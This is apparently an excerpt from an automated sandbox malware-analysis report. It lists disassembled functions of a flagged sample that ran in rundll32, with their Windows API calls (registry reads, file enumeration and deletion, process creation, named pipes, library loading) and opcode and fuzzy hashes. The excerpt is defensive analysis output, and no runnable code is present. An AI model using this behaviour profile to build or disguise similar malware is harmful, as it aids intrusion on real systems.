                                          • Opcode ID: fb79d9260e8a4636a966ae56ffd8054596bce2fc13d793bd13da1e7ac7c5a985
                                          • Instruction ID: 469a147c15595fa38a48f410b198676b84d75ab6d3605b3d9b0ef3fe5a56b16b
                                          • Opcode Fuzzy Hash: fb79d9260e8a4636a966ae56ffd8054596bce2fc13d793bd13da1e7ac7c5a985
                                          • Instruction Fuzzy Hash: FE813C7190020AEFEB109FA4DC88EBE7BF8EB49315F0144A9F609E7260DB755D85DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B67457 Relevance: 27.3, APIs: 18, Instructions: 274memorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B5EEA4: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,?,748FD3B0,76D85520,?,?,?,00B521C2,?), ref: 00B5EEDC
                                            • Part of subcall function 00B5EEA4: RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5EEF0
                                            • Part of subcall function 00B5EEA4: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,00B521C2,?,?,?), ref: 00B5EF0A
                                            • Part of subcall function 00B5EEA4: RegCloseKey.KERNEL32(?,?,?,?,00B521C2,?,?,?), ref: 00B5EF34
                                          • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 00B6749E
                                          • RtlAllocateHeap.NTDLL(00000000,00010000,?), ref: 00B674BC
                                          • HeapFree.KERNEL32(00000000,00000000,00000029,00000000,00000000,?), ref: 00B674E8
                                          • HeapFree.KERNEL32(00000000,00000000,0000002A,00000000,00000000,00000000,?,00000000,?,?,?), ref: 00B67556
                                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 00B675CE
                                          • wsprintfA.USER32 ref: 00B675EA
                                          • lstrlen.KERNEL32(00000000,00000000), ref: 00B675F5
                                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 00B6760C
                                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 00B67698
                                          • wsprintfA.USER32 ref: 00B676B3
                                          • lstrlen.KERNEL32(00000000,00000000), ref: 00B676BE
                                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 00B676D5
                                          • HeapFree.KERNEL32(00000000,?,?,?,00000008,0000000B,?,?,?,00000001,?,00000000,?,?,?), ref: 00B676F7
                                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 00B67712
                                          • wsprintfA.USER32 ref: 00B67729
                                          • lstrlen.KERNEL32(00000000,00000000), ref: 00B67734
                                            • Part of subcall function 00B53622: lstrlen.KERNEL32(00B5D8E9,00000000,?,?,?,?,00B5D8E9,00000035,00000000,?,00000000), ref: 00B53652
                                            • Part of subcall function 00B53622: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00B53668
                                            • Part of subcall function 00B53622: memcpy.NTDLL(00000010,00B5D8E9,00000000,?,?,00B5D8E9,00000035,00000000), ref: 00B5369E
                                            • Part of subcall function 00B53622: memcpy.NTDLL(00000010,00000000,00000035,?,?,00B5D8E9,00000035), ref: 00B536B9
                                            • Part of subcall function 00B53622: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 00B536D7
                                            • Part of subcall function 00B53622: GetLastError.KERNEL32(?,?,00B5D8E9,00000035), ref: 00B536E1
                                            • Part of subcall function 00B53622: HeapFree.KERNEL32(00000000,00000000,?,?,00B5D8E9,00000035), ref: 00B53704
                                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 00B6774B
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B67777
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Free$Allocate$lstrlen$wsprintf$QueryValuememcpy$CallCloseErrorLastNamedPipe
                                          • String ID:
                                          • API String ID: 3130754786-0
                                          • Opcode ID: 2bc570751f99c920adcceb9a6e51bf555ed3244e8c0553393d5c9e25f107f487
                                          • Instruction ID: 540b8f13e98245a0f42f9cc65a0581eae6c41cf33711bba850759e0a0ce28962
                                          • Opcode Fuzzy Hash: 2bc570751f99c920adcceb9a6e51bf555ed3244e8c0553393d5c9e25f107f487
                                          • Instruction Fuzzy Hash: 9DA18D71944109FFEF109FA8DC88DAEBBB9FB44309B1144A9F60AA3260DF355D84DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5DAD8 Relevance: 24.3, APIs: 16, Instructions: 258memorystringfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(?), ref: 00B5DAED
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(?,00000000,76D869A0,?,00000250,?,00000000), ref: 00B55A60
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(?,?,00000000), ref: 00B55A6C
                                            • Part of subcall function 00B55A14: memset.NTDLL ref: 00B55AB4
                                            • Part of subcall function 00B55A14: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00B55ACF
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(0000002C), ref: 00B55B07
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(?), ref: 00B55B0F
                                            • Part of subcall function 00B55A14: memset.NTDLL ref: 00B55B32
                                            • Part of subcall function 00B55A14: wcscpy.NTDLL ref: 00B55B44
                                            • Part of subcall function 00B55A14: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 00B55B6A
                                            • Part of subcall function 00B55A14: RtlEnterCriticalSection.NTDLL(?), ref: 00B55BA0
                                            • Part of subcall function 00B55A14: RtlLeaveCriticalSection.NTDLL(?), ref: 00B55BBC
                                            • Part of subcall function 00B55A14: FindNextFileW.KERNEL32(?,00000000), ref: 00B55BD5
                                            • Part of subcall function 00B55A14: WaitForSingleObject.KERNEL32(00000000), ref: 00B55BE7
                                            • Part of subcall function 00B55A14: FindClose.KERNEL32(?), ref: 00B55BFC
                                            • Part of subcall function 00B55A14: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00B55C10
                                            • Part of subcall function 00B55A14: lstrlenW.KERNEL32(0000002C), ref: 00B55C32
                                          • RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 00B5DB49
                                          • memcpy.NTDLL(00000000,?,00000000), ref: 00B5DB5C
                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00B5DB73
                                            • Part of subcall function 00B55A14: FindNextFileW.KERNEL32(?,00000000), ref: 00B55CA8
                                            • Part of subcall function 00B55A14: WaitForSingleObject.KERNEL32(00000000), ref: 00B55CBA
                                            • Part of subcall function 00B55A14: FindClose.KERNEL32(?), ref: 00B55CD5
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 00B5DB9E
                                          • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 00B5DBB6
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B5DC10
                                          • lstrlenW.KERNEL32(00000000,?), ref: 00B5DC33
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5DC45
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000014), ref: 00B5DCB9
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B5DCC9
                                            • Part of subcall function 00B5ADF8: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,00B6A2DC,?,00000000,-00000007,00B6377E,-00000007,?,00000000), ref: 00B5AE07
                                            • Part of subcall function 00B5ADF8: mbstowcs.NTDLL ref: 00B5AE23
                                          • CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 00B5DCF2
                                          • lstrlenW.KERNEL32(00B7A878,?), ref: 00B5DD6C
                                          • DeleteFileW.KERNEL32(?,?), ref: 00B5DD9A
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B5DDA8
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B5DDC9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heaplstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymbstowcsmemcpywcscpy
                                          • String ID:
                                          • API String ID: 72361108-0
                                          • Opcode ID: f944f4f3957d8b75f8066f5117a15e49456514ce77938addb49dc8f2b8b420ce
                                          • Instruction ID: 2a3123735708f9f85a15a6799bf4dadf266ee9cb0bed622ac6333cabd1786b3e
                                          • Opcode Fuzzy Hash: f944f4f3957d8b75f8066f5117a15e49456514ce77938addb49dc8f2b8b420ce
                                          • Instruction Fuzzy Hash: 29913971500219BFDB20DFA4DC88EAA7BFCEF49352B0544A5FA0DD7261DB309989CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5B526 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 149stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • memset.NTDLL ref: 00B5B554
                                          • StrChrA.SHLWAPI(?,0000000D), ref: 00B5B59A
                                          • StrChrA.SHLWAPI(?,0000000A), ref: 00B5B5A7
                                          • StrChrA.SHLWAPI(?,0000007C), ref: 00B5B5CE
                                          • StrTrimA.SHLWAPI(?,00B74FC4), ref: 00B5B5E3
                                          • StrChrA.SHLWAPI(?,0000003D), ref: 00B5B5EC
                                          • StrTrimA.SHLWAPI(00000001,00B74FC4), ref: 00B5B602
                                          • _strupr.NTDLL ref: 00B5B609
                                          • StrTrimA.SHLWAPI(?,?), ref: 00B5B616
                                          • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 00B5B65E
                                          • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 00B5B67D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
                                          • String ID: $;
                                          • API String ID: 4019332941-73438061
                                          • Opcode ID: 567784005dc0fb7fafdf15e487706765c4543a9015dc3ab2489a21ebb2431b18
                                          • Instruction ID: 23e1aeba2308e38fbd02baa52ae5d821be6fa9fdd6f4007c14e8d571c86c62a0
                                          • Opcode Fuzzy Hash: 567784005dc0fb7fafdf15e487706765c4543a9015dc3ab2489a21ebb2431b18
                                          • Instruction Fuzzy Hash: 0541B271548306AFD721AF688C45F1BBBE8EF54302F0408DDF9999B291DF74D9098B62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5B968 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 121processstringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.NTDLL ref: 00B5B97D
                                            • Part of subcall function 00B5ADF8: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,00B6A2DC,?,00000000,-00000007,00B6377E,-00000007,?,00000000), ref: 00B5AE07
                                            • Part of subcall function 00B5ADF8: mbstowcs.NTDLL ref: 00B5AE23
                                          • lstrlenW.KERNEL32(00000000,00000000,00000000,77D5DBB0,00000020,00000000), ref: 00B5B9B6
                                          • wcstombs.NTDLL ref: 00B5B9C0
                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77D5DBB0,00000020,00000000), ref: 00B5B9F1
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00B5B8C3), ref: 00B5BA1D
                                          • TerminateProcess.KERNEL32(?,000003E5), ref: 00B5BA33
                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00B5B8C3), ref: 00B5BA47
                                          • GetLastError.KERNEL32 ref: 00B5BA4B
                                          • GetExitCodeProcess.KERNEL32(?,00000001), ref: 00B5BA6B
                                          • CloseHandle.KERNEL32(?), ref: 00B5BA7A
                                          • CloseHandle.KERNEL32(?), ref: 00B5BA7F
                                          • GetLastError.KERNEL32 ref: 00B5BA83
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
                                          • String ID: D
                                          • API String ID: 2463014471-2746444292
                                          • Opcode ID: bbb1caf52f5ab0e2a691b73851b11595b4bc850582dffdf9ff622c4f0cb3b610
                                          • Instruction ID: 810b54f6b6aeef85c19d6068d7af4f15999829362a2268a97ad329268e96900d
                                          • Opcode Fuzzy Hash: bbb1caf52f5ab0e2a691b73851b11595b4bc850582dffdf9ff622c4f0cb3b610
                                          • Instruction Fuzzy Hash: E841EA71900118FFDB11EFA4CD85EAEBBBDEB08346F2040A9FA05B7151DB715E489B61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5AE4A Relevance: 21.2, APIs: 14, Instructions: 201memorystringthreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • StrChrA.SHLWAPI(?,0000002C), ref: 00B5AE99
                                          • StrTrimA.SHLWAPI(00000001,?), ref: 00B5AEB2
                                          • StrChrA.SHLWAPI(?,0000002C), ref: 00B5AEBD
                                          • StrTrimA.SHLWAPI(00000001,?), ref: 00B5AED6
                                          • lstrlen.KERNEL32(?,00000001,?,?), ref: 00B5AF6E
                                          • RtlAllocateHeap.NTDLL(00000000,?,00000001), ref: 00B5AF90
                                          • lstrcpy.KERNEL32(00000020,?), ref: 00B5AFAF
                                          • lstrlen.KERNEL32(?), ref: 00B5AFB9
                                          • memcpy.NTDLL(?,?,?), ref: 00B5AFFA
                                          • memcpy.NTDLL(?,?,?), ref: 00B5B00D
                                          • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 00B5B031
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00B5B050
                                          • HeapFree.KERNEL32(00000000,?,00000001,?,?), ref: 00B5B076
                                          • HeapFree.KERNEL32(00000000,00000001,00000001,?,?), ref: 00B5B092
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
                                          • String ID:
                                          • API String ID: 3323474148-0
                                          • Opcode ID: 95035ca66af972837950b6971165caf436ac379b8ecff8cb2be10c360faed418
                                          • Instruction ID: f89ac503f5c0e790dbfbc85f859531c483e44fca14c05215f57b6dfe91145098
                                          • Opcode Fuzzy Hash: 95035ca66af972837950b6971165caf436ac379b8ecff8cb2be10c360faed418
                                          • Instruction Fuzzy Hash: 47715A72508305AFD721DF28DC85B5BBBE4EB48301F044AADF999E3260D730D988CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5CB7A Relevance: 21.2, APIs: 14, Instructions: 161memorystringfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlen.KERNEL32(?), ref: 00B5CB91
                                          • lstrlen.KERNEL32(?), ref: 00B5CB98
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5CBAF
                                          • lstrcpy.KERNEL32(00000000,?), ref: 00B5CBC0
                                          • lstrcat.KERNEL32(?,?), ref: 00B5CBDC
                                          • lstrcat.KERNEL32(?,?), ref: 00B5CBED
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5CBFE
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B5CC9B
                                          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 00B5CCD4
                                          • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 00B5CCED
                                          • CloseHandle.KERNEL32(00000000), ref: 00B5CCF7
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B5CD07
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B5CD20
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B5CD30
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
                                          • String ID:
                                          • API String ID: 333890978-0
                                          • Opcode ID: ce13cb863f872aeefe757a5082053cf953ca42c6b4db2cc1275380fe12e96e26
                                          • Instruction ID: aae74c7bd06c538dc705dca4d78120d5703ad2c47a3117dc981bcc99f7db48b8
                                          • Opcode Fuzzy Hash: ce13cb863f872aeefe757a5082053cf953ca42c6b4db2cc1275380fe12e96e26
                                          • Instruction Fuzzy Hash: 04515F76400109BFDB019FA8DC84DAE7BBDEF49355B0544A6FA09D7120DB319E85CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5760F Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 128timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • wsprintfA.USER32 ref: 00B57651
                                          • OpenWaitableTimerA.KERNEL32(00100000,00000000,?), ref: 00B57664
                                          • CloseHandle.KERNEL32(00000000), ref: 00B5777C
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • memset.NTDLL ref: 00B57687
                                          • memcpy.NTDLL(?,000493E0,00000010,?,?,00000040), ref: 00B57706
                                          • RtlEnterCriticalSection.NTDLL(?), ref: 00B5771B
                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00B57733
                                          • GetLastError.KERNEL32(00B6BC40,?,?,?,?,?,?,?,00000040), ref: 00B5774B
                                          • RtlEnterCriticalSection.NTDLL(?), ref: 00B57757
                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 00B57766
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave$AllocateCloseErrorHandleHeapLastOpenTimerWaitablememcpymemsetwsprintf
                                          • String ID: 0x%08X$W
                                          • API String ID: 1559661116-2600449260
                                          • Opcode ID: c1f193f3cff2bf7e14ebe9d8adca9aa04a318810c5a0a414c7422fba417bbb61
                                          • Instruction ID: fe33c443d83558624efe2d2e8953067ccae04270dd1382d1cad2c189278d9db7
                                          • Opcode Fuzzy Hash: c1f193f3cff2bf7e14ebe9d8adca9aa04a318810c5a0a414c7422fba417bbb61
                                          • Instruction Fuzzy Hash: 474180B1900209EFDB10DFA4D885A9EBBF8FF08345F1085A9F959D7290DB749A54CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B60F11 Relevance: 21.1, APIs: 14, Instructions: 109libraryloaderstringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(?,00000000,?,?,?,00B5CE9C,?,?), ref: 00B60F1E
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,00B5CE9C,?,?), ref: 00B60F47
                                          • lstrcpyW.KERNEL32(-0000FFFE,?), ref: 00B60F67
                                          • lstrcpyW.KERNEL32(-00000002,?), ref: 00B60F83
                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00B5CE9C,?,?), ref: 00B60F8F
                                          • LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,00B5CE9C,?,?), ref: 00B60F92
                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00B5CE9C,?,?), ref: 00B60F9E
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B60FBB
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B60FD5
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B60FEB
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B61001
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B61017
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00B6102D
                                          • FreeLibrary.KERNEL32(00000000,?,?,?,?,00B5CE9C,?,?), ref: 00B61056
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
                                          • String ID:
                                          • API String ID: 3772355505-0
                                          • Opcode ID: fa46f017ddb8060b04e95f6f6bd1e4b5ebf009654e71fb056a63ee10af337a07
                                          • Instruction ID: 809a2b4394e910fe7ed7611e1861b9be6da3e7e7d3ddc79b14a0d6d60e6e1eff
                                          • Opcode Fuzzy Hash: fa46f017ddb8060b04e95f6f6bd1e4b5ebf009654e71fb056a63ee10af337a07
                                          • Instruction Fuzzy Hash: C73108B150420BAFEB109F68DC84E677BECEF04345B054866E909D7661DF3AED94CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B54D28 Relevance: 21.1, APIs: 14, Instructions: 82stringmemoryfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenW.KERNEL32(?,?,00000000,?,?,?,00B5DD96,?,?,?), ref: 00B54D3F
                                          • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,00B5DD96,?,?,?), ref: 00B54D4A
                                          • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,00B5DD96,?,?,?), ref: 00B54D52
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 00B54D67
                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00B54D78
                                          • lstrcatW.KERNEL32(00000000,?), ref: 00B54D8A
                                          • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,00B5DD96,?,?,?), ref: 00B54D8F
                                          • lstrcatW.KERNEL32(00000000,00B743E0), ref: 00B54D9B
                                          • lstrcatW.KERNEL32(00000000), ref: 00B54DA4
                                          • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,00B5DD96,?,?,?), ref: 00B54DA9
                                          • lstrcatW.KERNEL32(00000000,00B743E0), ref: 00B54DB5
                                          • lstrcatW.KERNEL32(00000000,00000002), ref: 00B54DD1
                                          • CopyFileW.KERNEL32(?,00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,00B5DD96,?,?,?), ref: 00B54DD9
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,00B5DD96,?,?,?), ref: 00B54DE7
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
                                          • String ID:
                                          • API String ID: 3635185113-0
                                          • Opcode ID: e178b23c5a4efb74682f0af954879f9a08bd631c1cbbc981bd60e493b4983c78
                                          • Instruction ID: e3e7ae8a888770f5ef334d3db51bb4cc0910f669798d7e915ad9292e86881e54
                                          • Opcode Fuzzy Hash: e178b23c5a4efb74682f0af954879f9a08bd631c1cbbc981bd60e493b4983c78
                                          • Instruction Fuzzy Hash: 2321A132141215AFD3216B64EC85F7FBBBCEF85B56F01046EFA0993160CF609C859B65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5BBF2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 110librarymemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(?), ref: 00B5BC12
                                          • TlsAlloc.KERNEL32 ref: 00B5BC1C
                                          • LoadLibraryA.KERNEL32(?), ref: 00B5BC45
                                          • LoadLibraryA.KERNEL32(?), ref: 00B5BC53
                                          • LoadLibraryA.KERNEL32(?), ref: 00B5BC61
                                          • LoadLibraryA.KERNEL32(?), ref: 00B5BC6F
                                          • LoadLibraryA.KERNEL32(?), ref: 00B5BC7D
                                          • LoadLibraryA.KERNEL32(?), ref: 00B5BC8B
                                          • ___HrLoadAllImportsForDll@4.DELAYIMP ref: 00B5BCB5
                                          • HeapFree.KERNEL32(00000000,?,?,?,0000000C,00000000), ref: 00B5BD36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load$Library$AllocDll@4FreeHeapImports
                                          • String ID: ~
                                          • API String ID: 1792504554-1707062198
                                          • Opcode ID: 54d25d670917c9d916fb1bc4ba422b78bc887b3f4a577043be5f9fe4c192badf
                                          • Instruction ID: 1538e142521ed5bd3fbf50896b23574d572785f1ebb3d7d72a142d0765ff0e0a
                                          • Opcode Fuzzy Hash: 54d25d670917c9d916fb1bc4ba422b78bc887b3f4a577043be5f9fe4c192badf
                                          • Instruction Fuzzy Hash: 0C418B71900209EFDB14EFA8DC88E9977FCEB48301B5544E6E909EB660DB71AD89CB11
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B56130 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98filememorystringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B629F2: memset.NTDLL ref: 00B62A14
                                            • Part of subcall function 00B629F2: CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 00B62ABE
                                          • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 00B56178
                                          • CloseHandle.KERNEL32(?), ref: 00B56184
                                          • PathFindFileNameW.SHLWAPI(?), ref: 00B56194
                                          • lstrlenW.KERNEL32(00000000), ref: 00B5619D
                                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00B561AE
                                          • wcstombs.NTDLL ref: 00B561BD
                                          • lstrlen.KERNEL32(?), ref: 00B561CA
                                          • UnmapViewOfFile.KERNEL32(?,?,?,00000000,00000001,?), ref: 00B56209
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 00B5621C
                                          • DeleteFileW.KERNEL32(?), ref: 00B56229
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
                                          • String ID: v
                                          • API String ID: 2256351002-1801730948
                                          • Opcode ID: 87ef4a7876a7c0e089849eba19ea70bb972926a8c30aae415ea735ad422fc443
                                          • Instruction ID: e50a995e0a905b50c8f4df6c180cbbd39a3c6937a92808e64484dbde35aeaf35
                                          • Opcode Fuzzy Hash: 87ef4a7876a7c0e089849eba19ea70bb972926a8c30aae415ea735ad422fc443
                                          • Instruction Fuzzy Hash: C8314031A01108ABDB219FA5DC49E9F7FB9EF85312F4040A5FA0AA3160DF318D99DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B6B262 Relevance: 18.2, APIs: 12, Instructions: 196memorystringthreadCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B5984B: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 00B59890
                                            • Part of subcall function 00B5984B: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 00B598A8
                                            • Part of subcall function 00B5984B: WaitForSingleObject.KERNEL32(00000000,?,00000000,?), ref: 00B59970
                                            • Part of subcall function 00B5984B: HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 00B59999
                                            • Part of subcall function 00B5984B: HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 00B599A9
                                            • Part of subcall function 00B5984B: RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 00B599B2
                                          • lstrcmp.KERNEL32(?,?), ref: 00B6B2D9
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B6B305
